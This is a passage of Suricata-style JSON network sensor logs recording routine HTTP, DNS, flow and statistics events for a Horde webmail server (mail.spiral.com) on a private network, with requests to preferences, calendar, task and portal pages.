Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592}} {"timestamp":"2020-02-29T00:02:47.707900+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":2}} {"timestamp":"2020-02-29T00:02:48.000399+0000","event_type":"stats","stats":{"uptime":13820,"capture":{"kernel_packets":132674,"kernel_drops":0},"decoder":{"pkts":132691,"bytes":92050316,"invalid":180,"ipv4":131262,"ipv6":8,"ethernet":132691,"raw":0,"null":0,"sll":0,"tcp":126258,"udp":4810,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2675,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2691,"synack":2682,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1720,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2192,"failed_udp":107},"tx":{"http":4465,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2269}},"flow_mgr":{"closed_pruned":2651,"new_pruned":15,"est_pruned":2239,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21821,"memcap_state":0,"memcap_global":0},"http":{"memuse":136750,"memcap":0}}} {"timestamp":"2020-02-29T00:02:51.772560+0000","flow_id":1433087412423287,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34708,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4238},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18578,"tx_id":0}} {"timestamp":"2020-02-29T00:02:52.000469+0000","flow_id":1308142499499515,"event_type":"flow","src_ip":"192.168.10.122","src_port":60747,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:57:51.757243+0000","end":"2020-02-28T23:57:51.868541+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:52.000920+0000","flow_id":1544885391843999,"event_type":"flow","src_ip":"192.168.10.122","src_port":54287,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:51.451231+0000","end":"2020-02-28T23:57:51.562559+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:52.668193+0000","flow_id":2193489897440047,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34712,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:02:52.668279+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34710,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1378,"tx_id":2}} {"timestamp":"2020-02-29T00:02:53.000849+0000","flow_id":248440938960222,"event_type":"flow","src_ip":"192.168.10.130","src_port":34696,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":16,"pkts_toclient":22,"bytes_toserver":1621,"bytes_toclient":23106,"start":"2020-02-29T00:01:46.922974+0000","end":"2020-02-29T00:01:52.380357+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:55.000229+0000","event_type":"stats","stats":{"uptime":13827,"capture":{"kernel_packets":132775,"kernel_drops":0},"decoder":{"pkts":132777,"bytes":92092100,"invalid":180,"ipv4":131348,"ipv6":8,"ethernet":132777,"raw":0,"null":0,"sll":0,"tcp":126334,"udp":4820,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2678,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2694,"synack":2685,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1723,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2197,"failed_udp":107},"tx":{"http":4470,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2274}},"flow_mgr":{"closed_pruned":2652,"new_pruned":15,"est_pruned":2242,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":2,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65531,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21160,"memcap_state":0,"memcap_global":0},"http":{"memuse":46973,"memcap":0}}} {"timestamp":"2020-02-29T00:02:56.692897+0000","flow_id":1853994208105121,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37326,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58577,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:56.798619+0000","flow_id":1853994208105121,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37326,"proto":"UDP","dns":{"type":"answer","id":58577,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:56.798619+0000","flow_id":1853994208105121,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37326,"proto":"UDP","dns":{"type":"answer","id":58577,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:56.883709+0000","flow_id":946128316031874,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34714,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3289}} {"timestamp":"2020-02-29T00:03:01.884497+0000","flow_id":946128316031874,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34714,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3289},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":16438,"tx_id":0}} {"timestamp":"2020-02-29T00:03:02.000199+0000","event_type":"stats","stats":{"uptime":13834,"capture":{"kernel_packets":132778,"kernel_drops":0},"decoder":{"pkts":132791,"bytes":92097298,"invalid":180,"ipv4":131362,"ipv6":8,"ethernet":132791,"raw":0,"null":0,"sll":0,"tcp":126346,"udp":4822,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2679,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2695,"synack":2686,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1724,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2198,"failed_udp":107},"tx":{"http":4471,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2275}},"flow_mgr":{"closed_pruned":2652,"new_pruned":15,"est_pruned":2242,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21491,"memcap_state":0,"memcap_global":0},"http":{"memuse":47053,"memcap":0}}} {"timestamp":"2020-02-29T00:03:02.001199+0000","flow_id":2014930921353933,"event_type":"flow","src_ip":"192.168.10.130","src_port":34692,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":18,"bytes_toserver":2240,"bytes_toclient":17008,"start":"2020-02-29T00:01:20.225997+0000","end":"2020-02-29T00:02:01.561213+0000","age":41,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:02.101930+0000","flow_id":1908200990740010,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42172,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23108,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:02.213187+0000","flow_id":1908200990740010,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42172,"proto":"UDP","dns":{"type":"answer","id":23108,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:02.213187+0000","flow_id":1908200990740010,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42172,"proto":"UDP","dns":{"type":"answer","id":23108,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:02.356770+0000","flow_id":1392564397028430,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3659}} {"timestamp":"2020-02-29T00:03:03.000701+0000","flow_id":1508640163537177,"event_type":"flow","src_ip":"192.168.10.122","src_port":55863,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:58:02.368921+0000","end":"2020-02-28T23:58:02.481155+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:05.506519+0000","flow_id":1901152949615255,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59490,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19220,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:05.617809+0000","flow_id":1901152949615255,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59490,"proto":"UDP","dns":{"type":"answer","id":19220,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:05.617809+0000","flow_id":1901152949615255,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59490,"proto":"UDP","dns":{"type":"answer","id":19220,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:05.785158+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7618}} {"timestamp":"2020-02-29T00:03:07.231023+0000","flow_id":1392564397028430,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34716,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3659},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18958,"tx_id":0}} {"timestamp":"2020-02-29T00:03:07.238381+0000","flow_id":2064146958623533,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48633,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":686,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:07.343781+0000","flow_id":2064146958623533,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48633,"proto":"UDP","dns":{"type":"answer","id":686,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:07.343781+0000","flow_id":2064146958623533,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48633,"proto":"UDP","dns":{"type":"answer","id":686,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:07.485303+0000","flow_id":1392564397028430,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5173}} {"timestamp":"2020-02-29T00:03:08.000478+0000","flow_id":2113444573572588,"event_type":"flow","src_ip":"192.168.10.122","src_port":36684,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:58:07.290284+0000","end":"2020-02-28T23:58:07.401752+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:08.000652+0000","flow_id":1007666603637629,"event_type":"flow","src_ip":"192.168.10.81","src_port":52652,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":23,"bytes_toserver":3083,"bytes_toclient":19825,"start":"2020-02-29T00:01:58.211837+0000","end":"2020-02-29T00:02:07.266149+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:08.000779+0000","flow_id":1732648478160707,"event_type":"flow","src_ip":"192.168.10.122","src_port":39450,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:58:07.505667+0000","end":"2020-02-28T23:58:07.617342+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:08.941077+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7618},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":39619,"tx_id":0}} {"timestamp":"2020-02-29T00:03:08.950105+0000","flow_id":2220655566946137,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49403,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":63050,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:09.000201+0000","event_type":"stats","stats":{"uptime":13841,"capture":{"kernel_packets":132831,"kernel_drops":0},"decoder":{"pkts":132841,"bytes":92119962,"invalid":180,"ipv4":131410,"ipv6":8,"ethernet":132841,"raw":0,"null":0,"sll":0,"tcp":126388,"udp":4828,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099360},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2681,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2697,"synack":2688,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1726,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2201,"failed_udp":107},"tx":{"http":4474,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2278}},"flow_mgr":{"closed_pruned":2653,"new_pruned":15,"est_pruned":2243,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":3,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21751,"memcap_state":0,"memcap_global":0},"http":{"memuse":168043,"memcap":0}}} {"timestamp":"2020-02-29T00:03:09.055838+0000","flow_id":2220655566946137,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49403,"proto":"UDP","dns":{"type":"answer","id":63050,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:09.055838+0000","flow_id":2220655566946137,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49403,"proto":"UDP","dns":{"type":"answer","id":63050,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:09.122920+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8171}} {"timestamp":"2020-02-29T00:03:09.151356+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8171},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":33109,"tx_id":1}} {"timestamp":"2020-02-29T00:03:09.190153+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":813}} {"timestamp":"2020-02-29T00:03:09.191876+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":813},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":2235,"tx_id":2}} {"timestamp":"2020-02-29T00:03:09.192187+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/quickfinder.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1159}} {"timestamp":"2020-02-29T00:03:09.205894+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/quickfinder.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1159},"app_proto":"http","fileinfo":{"filename":"\/js\/quickfinder.js","state":"CLOSED","stored":false,"size":3277,"tx_id":3}} {"timestamp":"2020-02-29T00:03:09.206216+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/tables.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 